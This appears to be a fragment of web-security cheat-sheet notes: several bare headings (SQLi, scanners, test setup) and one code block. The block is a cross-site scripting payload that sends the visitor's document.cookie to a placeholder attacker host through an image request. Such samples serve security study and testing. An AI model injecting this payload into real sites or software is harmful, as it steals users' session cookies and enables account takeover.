Web related

General Stuff

SQLi

Scanners:

Meta-information variables:

Cheat sheet

  <script>
  function hack(){
     XSSImage=new Image;
     XSSImage.src="http://attacker's site.com/steal?stuff=" + document.cookie + "";
  }
  hack();
  </script>
  

Test setup